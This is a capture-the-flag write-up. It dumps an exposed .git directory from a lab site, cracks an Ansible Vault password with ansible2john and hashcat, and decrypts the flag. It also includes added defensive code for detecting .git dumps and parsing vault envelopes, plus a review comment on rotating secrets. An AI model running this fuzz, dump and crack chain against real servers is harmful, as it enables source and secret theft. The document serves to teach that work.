Statement:

One of your friends is learning the wonderful world of DevOps and invites you to check out his site. He tells you that it’s deployed and managed according to the DevOps practices he’s learned. However, he needs to work a little harder on security…

https://devoops.flag4all.sh

Author: 0xlildoudou (BZHack)


I start by fuzzing for endpoints on the given URL:

ffuf -w ~/git/SecLists/Fuzzing/fuzz-Bo0oM.txt -u "https://devoops.flag4all.sh/FUZZ"


        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.5.0
________________________________________________

 :: Method           : GET
 :: URL              : https://devoops.flag4all.sh/FUZZ
 :: Wordlist         : FUZZ: /home/sanlokii/git/SecLists/Fuzzing/fuzz-Bo0oM.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

.git/                   [Status: 403, Size: 153, Words: 3, Lines: 8, Duration: 19ms]
.git/config             [Status: 200, Size: 92, Words: 9, Lines: 6, Duration: 19ms]
.git                    [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 13ms]
.git/index              [Status: 200, Size: 305, Words: 3, Lines: 4, Duration: 13ms]
.git/logs/HEAD          [Status: 200, Size: 819, Words: 41, Lines: 6, Duration: 14ms]
.git/logs/refs          [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 26ms]
.git/logs/              [Status: 403, Size: 153, Words: 3, Lines: 8, Duration: 29ms]
.git/HEAD               [Status: 200, Size: 23, Words: 2, Lines: 2, Duration: 28ms]
index.html              [Status: 200, Size: 27, Words: 5, Lines: 1, Duration: 13ms]
:: Progress: [4842/4842] :: Job [1/1] :: 2100 req/sec :: Duration: [0:00:02] :: Errors: 0 ::

I see that the .git directory is exposed, so I use the git-dumper tool to retrieve its contents locally:

git-dumper https://devoops.flag4all.sh/.git /tmp/git

[-] Testing https://devoops.flag4all.sh/.git/HEAD [200]
[-] Testing https://devoops.flag4all.sh/.git/ [403]
[-] Fetching common files
[-] Fetching https://devoops.flag4all.sh/.git/hooks/commit-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/COMMIT_EDITMSG [200]
[-] Fetching https://devoops.flag4all.sh/.git/description [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-applypatch.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-commit.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/applypatch-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-update.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-receive.sample [404]
[-] https://devoops.flag4all.sh/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-push.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-rebase.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/post-commit.sample [404]
[-] https://devoops.flag4all.sh/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.gitignore [404]
[-] https://devoops.flag4all.sh/.gitignore responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/pre-receive.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/index [200]
[-] Fetching https://devoops.flag4all.sh/.git/hooks/update.sample [200]
[-] Fetching https://devoops.flag4all.sh/.git/info/exclude [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/info/packs [404]
[-] https://devoops.flag4all.sh/.git/objects/info/packs responded with status code 404
[-] Finding refs/
[-] Fetching https://devoops.flag4all.sh/.git/info/refs [404]
[-] Fetching https://devoops.flag4all.sh/.git/ORIG_HEAD [404]
[-] https://devoops.flag4all.sh/.git/info/refs responded with status code 404
[-] https://devoops.flag4all.sh/.git/ORIG_HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/HEAD [200]
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/heads/master [200]
[-] Fetching https://devoops.flag4all.sh/.git/FETCH_HEAD [404]
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/master [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/master responded with status code 404
[-] https://devoops.flag4all.sh/.git/FETCH_HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/stash [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/stash responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/HEAD [404]
[-] https://devoops.flag4all.sh/.git/logs/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/config [200]
[-] Fetching https://devoops.flag4all.sh/.git/refs/remotes/origin/HEAD [404]
[-] https://devoops.flag4all.sh/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/logs/HEAD [200]
[-] Fetching https://devoops.flag4all.sh/.git/refs/heads/master [200]
[-] Fetching https://devoops.flag4all.sh/.git/packed-refs [404]
[-] https://devoops.flag4all.sh/.git/packed-refs responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/refs/remotes/origin/master [404]
[-] Fetching https://devoops.flag4all.sh/.git/refs/wip/wtree/refs/heads/master [404]
[-] https://devoops.flag4all.sh/.git/refs/remotes/origin/master responded with status code 404
[-] https://devoops.flag4all.sh/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/refs/stash [404]
[-] Fetching https://devoops.flag4all.sh/.git/refs/wip/index/refs/heads/master [404]
[-] https://devoops.flag4all.sh/.git/refs/stash responded with status code 404
[-] https://devoops.flag4all.sh/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching https://devoops.flag4all.sh/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] https://devoops.flag4all.sh/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching https://devoops.flag4all.sh/.git/objects/50/c8f89388baa410afdfc9c2fc8c35a129acf38f [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/e9/a45f6b5624ac920af2cbc38c15451e15d09b9d [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/a0/2c53a5e7a305dd7e20d3bcf1c17c979f2bab97 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/36/54f3ab8c69f2454bc92c4d0a74658e4bbd1619 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/fa/e74d667441a668193e0e25c0e8a89fa91695c0 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/69/c2e48c84927a7987764868fff94ae1ceb3551e [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/0a/7aad9c7a133ed8def842b5e21b98fb02bfc8b3 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/14/b0157ed359ae21f7ae00b0714b7c7802e057f3 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/5f/630a81ced302a5d2a1b8cd106ce783726a184f [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/3a/552a610b4545f644ba0224ad6d5fcf5c8ec6e5 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/07/e713c33e88323570db685f87c9afede0791b8d [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/ad/61dba8369f92be71c3496e6306f73315202e95 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/c0/51b87c889213195bc429012b531cdc11af31e6 [200]
[-] Fetching https://devoops.flag4all.sh/.git/objects/91/374d99a4f7ffbfb68af1130f2443e9e3f0ce76 [200]
[-] Running git checkout .
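
Seen from the server side, a dump like this one is easy to tell apart from a single scanner probe: one client is served many distinct `.git/objects/xx/…` files. The sketch below is an added example, not part of the original write-up; the log lines are constructed (common log format, documentation IP addresses), and the function name and `min_objects` threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines; object paths reuse three of the objects fetched above
SAMPLE_LOG = """\
203.0.113.7 - - [08/Oct/2023:14:02:11 +0000] "GET /.git/HEAD HTTP/1.1" 200 23
203.0.113.7 - - [08/Oct/2023:14:02:11 +0000] "GET /.git/ HTTP/1.1" 403 153
203.0.113.7 - - [08/Oct/2023:14:02:12 +0000] "GET /.git/config HTTP/1.1" 200 92
203.0.113.7 - - [08/Oct/2023:14:02:12 +0000] "GET /.git/index HTTP/1.1" 200 305
203.0.113.7 - - [08/Oct/2023:14:02:13 +0000] "GET /.git/objects/fa/e74d667441a668193e0e25c0e8a89fa91695c0 HTTP/1.1" 200 160
203.0.113.7 - - [08/Oct/2023:14:02:13 +0000] "GET /.git/objects/36/54f3ab8c69f2454bc92c4d0a74658e4bbd1619 HTTP/1.1" 200 170
203.0.113.7 - - [08/Oct/2023:14:02:13 +0000] "GET /.git/objects/07/e713c33e88323570db685f87c9afede0791b8d HTTP/1.1" 200 290
198.51.100.20 - - [08/Oct/2023:15:10:40 +0000] "GET /.git/config HTTP/1.1" 200 92
192.0.2.5 - - [08/Oct/2023:15:30:02 +0000] "GET /index.html HTTP/1.1" 200 27
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD) (\S+) [^"]*" (\d{3}) ')
LOOSE_OBJECT = re.compile(r"/\.git/objects/[0-9a-f]{2}/[0-9a-f]{38}$")


def git_exposure_report(log_text, min_objects=3):
    """Per client: distinct .git paths served with 200, and whether it looks like a repo dump."""
    served = defaultdict(set)
    objects = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, path, status = m.groups()
        path = path.split("?", 1)[0]
        # Only successful responses leak repository content; 403/404 are ignored
        if "/.git/" not in path or status != "200":
            continue
        served[ip].add(path)
        if LOOSE_OBJECT.search(path):
            objects[ip].add(path)
    return {
        ip: {
            "served": len(paths),
            "objects": len(objects[ip]),
            "repo_dump": len(objects[ip]) >= min_objects,
        }
        for ip, paths in served.items()
    }
```

Any entry in the report, even one with `repo_dump` false, means the web server is handing out repository metadata and `.git` should be blocked or removed from the web root.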

I run git log to display the latest commits:

commit fae74d667441a668193e0e25c0e8a89fa91695c0 (HEAD -> master)
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    Remove the vault

commit 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    add more ansible security

commit 69c2e48c84927a7987764868fff94ae1ceb3551e
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:00 2023 +0000

    remove log

commit 0a7aad9c7a133ed8def842b5e21b98fb02bfc8b3
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:00 2023 +0000

    add update playbook

commit 5f630a81ced302a5d2a1b8cd106ce783726a184f
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:50:59 2023 +0000

    Add index

Inspecting the contents of the commits, I notice a file encrypted with Ansible Vault:

git show 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619

commit 3654f3ab8c69f2454bc92c4d0a74658e4bbd1619
Author: 0xlildoudou <0xlildoudou@flag4all.fr>
Date:   Sun Oct 8 13:51:01 2023 +0000

    add more ansible security

diff --git a/vault.txt b/vault.txt
new file mode 100644
index 0000000..07e713c
--- /dev/null
+++ b/vault.txt
@@ -0,0 +1,7 @@
+$ANSIBLE_VAULT;1.1;AES256
+35333634626634613035353634623737306439616563666463636237333261306435363865386665
+3130633139353236303762396363366633363061303466300a336436333130396432396234633530
+63306638663834643361613331323535303530336464653766353036386632386531323835666166
+6237303966313765320a333236376461626633333830356262303133383530613939646232623434
+65643565613365363665343438366563313463333333316163636463613965323630346465326663
+6632633765666331363335663838646662626564656334336166
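
Review bot: the new vault.txt (all seven added lines) puts an Ansible Vault envelope, header $ANSIBLE_VAULT;1.1;AES256, under version control, so its confidentiality rests entirely on the strength of the vault password for anyone who can read the repository. Deleting the file in a later commit ("Remove the vault" in the log above) does not take this blob out of history; I would rotate the secret it holds, use a long random vault password, and keep vaulted files out of any repository that is deployed together with its .git directory.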

With the ansible2john module of the John the Ripper tool, I get the following hash:

ansible2john.py vault.txt

vault.txt:$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2

I then use hashcat to crack the vault password:

hashcat -a 0 -m 16900 '$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2' --wordlist rockyou.txt

$ansible$0*0*5364bf4a05564b770d9aecfdccb732a0d568e8fe10c1952607b9cc6f360a04f0*3267dabf33805bb013850a99db2b44ed5ea3e66e4486ec14c3331accdca9e2604de2fcf2c7efc1635f88dfbbedec43af*3d63109d29b4c50c0f8f84d3aa312550503dde7f5068f28e1285fafb709f17e2:netadmin
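
Why this works offline: the vault body is just hex of `salt\nhmac\nciphertext`, and the HMAC lets anyone holding the file test a password without a server in the loop. The block below is an added example, not part of the original write-up or of Ansible's code; it uses only the vault.txt and password shown on this page, the function names are hypothetical, and the KDF parameters (PBKDF2-HMAC-SHA256, 10000 iterations, 80 bytes) are those of the vault 1.1 AES256 format.

```python
import hashlib
import hmac

# vault.txt exactly as it appears in the commit diff on this page
VAULT_TXT = """$ANSIBLE_VAULT;1.1;AES256
35333634626634613035353634623737306439616563666463636237333261306435363865386665
3130633139353236303762396363366633363061303466300a336436333130396432396234633530
63306638663834643361613331323535303530336464653766353036386632386531323835666166
6237303966313765320a333236376461626633333830356262303133383530613939646232623434
65643565613365363665343438366563313463333333316163636463613965323630346465326663
6632633765666331363335663838646662626564656334336166
"""


def parse_vault(text):
    """Split a vault envelope into version, salt, HMAC and ciphertext (hex strings)."""
    header, *body = text.strip().splitlines()
    magic, version, cipher = header.split(";")[:3]
    if magic != "$ANSIBLE_VAULT" or cipher != "AES256":
        raise ValueError("not an AES256 Ansible Vault envelope")
    # The body is the hex encoding of "salt_hex\nhmac_hex\nciphertext_hex"
    inner = bytes.fromhex("".join(line.strip() for line in body)).decode("ascii")
    salt_hex, hmac_hex, ct_hex = inner.split("\n", 2)
    return {"version": version, "salt": salt_hex, "hmac": hmac_hex, "ciphertext": ct_hex}


def john_format(v):
    """Reorder the fields as salt*ciphertext*hmac, the layout of the hash line above."""
    return "$ansible$0*0*{salt}*{ciphertext}*{hmac}".format(**v)


def password_matches(v, password):
    """Recompute the envelope HMAC from a password, the same check a decrypt performs."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(v["salt"]),
                             10000, dklen=80)
    mac_key = dk[32:64]  # bytes 0-31 are the AES key, bytes 64-79 the CTR IV
    mac = hmac.new(mac_key, bytes.fromhex(v["ciphertext"]), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, v["hmac"])
```

With only 10000 PBKDF2 iterations between a guess and a verdict, a dictionary word as vault password gives almost no protection once the file leaks.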

Now that I know the password is netadmin, I use it to retrieve the plaintext of the vault.txt file:

ansible-vault decrypt vault.txt
Vault password: netadmin
Decryption successful

cat vault.txt
FLAG{UsE_4ns1Bl3_WiTh_Strong_P@ssw0rd}

Flag: FLAG{UsE_4ns1Bl3_WiTh_Strong_P@ssw0rd}